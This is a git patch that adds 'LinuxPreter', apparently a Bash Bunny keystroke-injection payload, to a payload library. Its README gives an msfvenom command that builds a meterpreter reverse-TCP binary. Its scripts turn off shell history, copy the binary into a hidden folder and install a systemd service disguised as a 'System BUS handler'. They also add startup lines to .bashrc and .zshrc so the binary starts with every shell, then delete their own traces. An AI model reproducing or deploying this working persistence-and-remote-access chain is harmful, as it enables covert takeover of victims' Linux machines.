From a4141f73126b41176cb24949f6de6c201b1a9201 Mon Sep 17 00:00:00 2001
From: drapl0n tuxed0 <87269662+drapl0n@users.noreply.github.com>
Date: Sun, 13 Mar 2022 03:57:24 +0530
Subject: [PATCH] Uploaded LinuxPreter (#502)

* Uploaded BunnyLogger

* uploading payload intel

* Create README.md

* Update README.md

* uploaded LinuxPreter
---
 .../remote_access/LinuxPreter/README.md       | 36 ++++++++++++
 .../remote_access/LinuxPreter/payload.sh      | 12 ++++
 .../remote_access/LinuxPreter/payload.txt     | 56 +++++++++++++++++++
 3 files changed, 104 insertions(+)
 create mode 100644 payloads/library/remote_access/LinuxPreter/README.md
 create mode 100644 payloads/library/remote_access/LinuxPreter/payload.sh
 create mode 100644 payloads/library/remote_access/LinuxPreter/payload.txt

diff --git a/payloads/library/remote_access/LinuxPreter/README.md b/payloads/library/remote_access/LinuxPreter/README.md
new file mode 100644
index 00000000..0a0933a9
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/README.md
@@ -0,0 +1,36 @@
+## About:
+* Title: LinuxPreter
+* Description: Injects meterpreter payload and makes it persistent.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Remote Access
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
+
+### Workflow:
+* Keeping tracks clear by preventing storage of history.
+* Fetching BashBunny's block device and mounting it.
+* Transfering payload script and payload itself. 
+* Deleting scripts from victims machine and unmounting bunny. 
+
+### Create Meterpreter payload:
+* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT NO> -f elf -o sysHandle.bin```
+* NOTE: Only change IP address and Port number in the above command.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName       | Directory                     |
+| -------------- | ----------------------------- |
+| payload.txt    | /payload/switch1/             |
+| payload.sh     | /payload/                     |
+| sysHandle.bin  | /tools/                       |
+
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n  
diff --git a/payloads/library/remote_access/LinuxPreter/payload.sh b/payloads/library/remote_access/LinuxPreter/payload.sh
new file mode 100644
index 00000000..cfecd2cf
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/payload.sh
@@ -0,0 +1,12 @@
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+mkdir /var/tmp/.system
+cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
+chmod +x /var/tmp/.system/sysHandle.bin 
+mkdir -p ~/.config/systemd/user/
+systemctl --user start systemPer.service
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service
+
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
diff --git a/payloads/library/remote_access/LinuxPreter/payload.txt b/payloads/library/remote_access/LinuxPreter/payload.txt
new file mode 100644
index 00000000..34118624
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/payload.txt
@@ -0,0 +1,56 @@
+# Title: LinuxPreter
+# Description: Injects meterpreter payload and makes it persistent.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Remote Access
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 1000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER 
+LED FINISH